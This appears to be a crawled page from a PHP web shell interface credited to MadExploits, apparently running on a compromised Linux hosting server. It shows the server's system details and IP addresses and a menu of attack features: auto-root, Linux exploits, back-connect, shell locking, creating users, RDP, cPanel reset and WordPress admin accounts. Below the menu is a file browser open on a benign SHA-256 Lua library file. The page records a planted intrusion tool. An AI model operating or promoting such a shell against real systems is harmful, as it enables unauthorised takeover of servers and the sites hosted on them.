Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
imunify360-webshield /
lualib /
resty /
[ HOME SHELL ]
Name
Size
Permission
Action
core
[ DIR ]
drwxr-xr-x
dns
[ DIR ]
drwxr-xr-x
limit
[ DIR ]
drwxr-xr-x
lrucache
[ DIR ]
drwxr-xr-x
template
[ DIR ]
drwxr-xr-x
upstream
[ DIR ]
drwxr-xr-x
websocket
[ DIR ]
drwxr-xr-x
aes.lua
9.62
KB
-rw-r--r--
cookie.lua
5.55
KB
-rw-r--r--
core.lua
710
B
-rw-r--r--
http.lua
28.99
KB
-rw-r--r--
http_headers.lua
1.12
KB
-rw-r--r--
lock.lua
4.58
KB
-rw-r--r--
lrucache.lua
6.95
KB
-rw-r--r--
md5.lua
1.19
KB
-rw-r--r--
random.lua
672
B
-rw-r--r--
sha.lua
236
B
-rw-r--r--
sha1.lua
1.16
KB
-rw-r--r--
sha224.lua
1.02
KB
-rw-r--r--
sha256.lua
1.19
KB
-rw-r--r--
sha384.lua
1.02
KB
-rw-r--r--
sha512.lua
1.33
KB
-rw-r--r--
shell.lua
4.88
KB
-rw-r--r--
signal.lua
3.12
KB
-rwxr-xr-x
string.lua
887
B
-rw-r--r--
template.lua
22.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sha256.lua
-- Copyright (C) by Yichun Zhang (agentzh) require "resty.sha" local ffi = require "ffi" local ffi_new = ffi.new local ffi_str = ffi.string local C = ffi.C local setmetatable = setmetatable --local error = error local _M = { _VERSION = '0.16' } local mt = { __index = _M } ffi.cdef[[ typedef struct SHA256state_st { SHA_LONG h[8]; SHA_LONG Nl,Nh; SHA_LONG data[SHA_LBLOCK]; unsigned int num,md_len; } SHA256_CTX; int SHA256_Init(SHA256_CTX *c); int SHA256_Update(SHA256_CTX *c, const void *data, size_t len); int SHA256_Final(unsigned char *md, SHA256_CTX *c); ]] local digest_len = 32 local buf = ffi_new("char[?]", digest_len) local ctx_ptr_type = ffi.typeof("SHA256_CTX[1]") function _M.new(self) local ctx = ffi_new(ctx_ptr_type) if C.SHA256_Init(ctx) == 0 then return nil end return setmetatable({ _ctx = ctx }, mt) end function _M.update(self, s) return C.SHA256_Update(self._ctx, s, #s) == 1 end function _M.final(self) if C.SHA256_Final(buf, self._ctx) == 1 then return ffi_str(buf, digest_len) end return nil end function _M.reset(self) return C.SHA256_Init(self._ctx) == 1 end return _M
Close